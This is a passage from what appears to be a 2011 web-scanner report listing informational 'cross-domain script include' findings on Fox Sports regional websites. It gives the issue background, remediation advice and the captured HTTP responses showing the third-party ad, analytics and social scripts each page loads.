Wisconsin</a><br>
<a href="http://www.nesn.com"

target="_blank">
NESN Boston</a>
...[SNIP]...
</a> | <a target="_blank" href="http://www.razorgator.com/tickets/sports/" onclick="this.href=this.href+'?c=79-0-0-0-0-0-0&amp;pid=foxsports'">Tickets</a>
...[SNIP]...
<div style="text-align: left;">Statistical Information provided by: <a href="http://www.stats.com" target="new">STATS LLC</a>
...[SNIP]...
<a href="javascript:void(window.open('http://www.platformic.com'));"><img src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/medialib/266/191108.jpg" alt="" alignment="texttop" border="0" hspace="" vspace=""></a>
...[SNIP]...
<div>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-804171h&amp;cg=0&amp;cc=1&amp;ts=noscript"
width="1" height="1" alt="" />

</div>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN Privacy</a>
...[SNIP]...
<li><a href="http://g.msn.com/0TO_/enus">Legal</a></li><li><a href="http://advertising.msn.com/msn/">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="http://rss.msn.com">RSS</a>
...[SNIP]...
<li class="first"><a href="http://g.msn.com/AIPRIV/en-us">About our ads</a>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxwest/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...

6. Cross-domain script include  previous  next
There are 26 instances of this issue:

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.


6.1. http://www.foxsportsarizona.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=af9575f12421c13e00e39bf3dd199ca5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 84050

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appjs/~1294839306/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/main;tile=3;sz=300x250;ord=1294849839?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.2. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html?blockID=388863&feedID=3698 HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:39 GMT
Server: Apache
Set-Cookie: PHPSESSID=807fffd592a9bf6fb7d8e7c887d5cf39; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 73519

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<link rel="image_src" href="http://www.foxsportsarizona.com/common/medialib/271/285411_thumb.jpg" />
<script language="javascript" src="http://wac.24C5.edgecastcdn.net/8024C5/platform/common/js/jquery-1.4.2.min.js" type="text/javascript" language="javascript1.2"></script>
...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appjs/~1294839306/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1294849814?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1294849814?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.3. http://www.foxsportsarizona.com/01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsarizona.com
Path:   /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/Freshman-Dyer-runs-his-way-into-Auburn-l/landing.html HTTP/1.1
Host: www.foxsportsarizona.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:38 GMT
Server: Apache
Set-Cookie: PHPSESSID=dce594637b946858ac8562e11cd29bfc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 51085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/appjs/~1294839306/s=main~thePlatform^swfobject~ugc/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=728x90;ord=1294849838?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.arizona/landing;tile=3;sz=300x250;ord=1294849838?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxariz/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.4. http://www.foxsportscarolinas.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportscarolinas.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportscarolinas.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 12 Jan 2011 16:30:48 GMT
Date: Wed, 12 Jan 2011 16:30:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=3271d39cc8617c11fa58992b3826f5a0; path=/
Content-Length: 67154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.carolinas/main;tile=3;sz=300x250;ord=1294849844?" type="text/javascript">
</script>
...[SNIP]...

6.5. http://www.foxsportsdetroit.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:03 GMT
Server: Apache
Set-Cookie: PHPSESSID=f98e5e7a4e031dcbf5dbf7acff41bb35; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 74214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/main;tile=3;sz=300x250;ord=1294849825?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.6. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/Hoke-who/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:26:41 GMT
Server: Apache
Set-Cookie: PHPSESSID=05e45841134be0f8e849c03d0475b24f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849601?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849601?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.7. http://www.foxsportsdetroit.com/01/11/11/Hoke-who/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/Hoke-who/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/Hoke-who/landing.html?blockID=389355&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:23:05 GMT
Server: Apache
Set-Cookie: PHPSESSID=85ff0994810525300d4e54d63c899e70; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 66884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849838?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849838?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.8. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html?blockID=389326&feedID=3701 HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:48 GMT
Server: Apache
Set-Cookie: PHPSESSID=539c0237c90a637a856e33299aeaf9bb; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 62871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc~comment_box/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849808?" type="text/javascript">
</script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849809?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.9. http://www.foxsportsdetroit.com/01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsdetroit.com
Path:   /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/en-Mike-Brady-Bunch-Michigan-hopes-so/landing.html HTTP/1.1
Host: www.foxsportsdetroit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:47 GMT
Server: Apache
Set-Cookie: PHPSESSID=f7fa2ad3beef39ba25d4799d4abff0a5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50741

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/appjs/~1294849066/s=main~thePlatform^swfobject~ugc/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=728x90;ord=1294849601?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.detroit/landing;tile=3;sz=300x250;ord=1294849601?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxdetro/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.10. http://www.foxsportsflorida.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=aac2f23f8215a809567600eb37ffca51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 76322

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~thePlatform^util~thePlatform^qos~thePlatform^qos_mps~flashobject~ugc~flicker/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<div id = "main_187">
<script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/main;tile=3;sz=300x250;ord=1294849850?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.11. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
Path:   /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html HTTP/1.1
Host: www.foxsportsflorida.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 16:30:50 GMT
Server: Apache
Set-Cookie: PHPSESSID=552dd2fb6e357039c005c0bb8665d203; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 47665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml">
<html lang="en">

...[SNIP]...
</script>-->

<script language="javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/appjs/~1294841769/s=main~thePlatform^swfobject~flashobject/menz=1" type="text/javascript"></script>
...[SNIP]...
<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/jquery-1.3.2.min.js"></script>
<!--[if !IE]>--><script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/4/mozcompat.js"></script><!--<![endif]-->
<script type="text/javascript" src="http://blstj.msn.com/br/chan/mops/js/foxsportsheader/core.js"></script>
<script type="text/javascript" src="http://blstj.msn.com/br/gbl/js/7/navigation.js"></script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=728x90;ord=1294849851?" type="text/javascript">
</script>
...[SNIP]...
<!-- begin ad tag -->
<script language="JavaScript"
src="http://ad.doubleclick.net/adj/rsn.florida/landing_reiter;tile=3;sz=300x250;ord=1294849851?" type="text/javascript">
</script>
...[SNIP]...
<!-- SiteCatalyst code version: H.17..
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com -->
<script type="text/javascript" src="http://wac.2532.edgecastcdn.net/802532/foxsport/common/js/omniture/s_code_analytics_fsn.js"></script>
...[SNIP]...

6.12. http://www.foxsportsflorida.com/01/11/11/When-LeBron-is-bad-hes-really-really-goo/landing_reiter.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foxsportsflorida.com
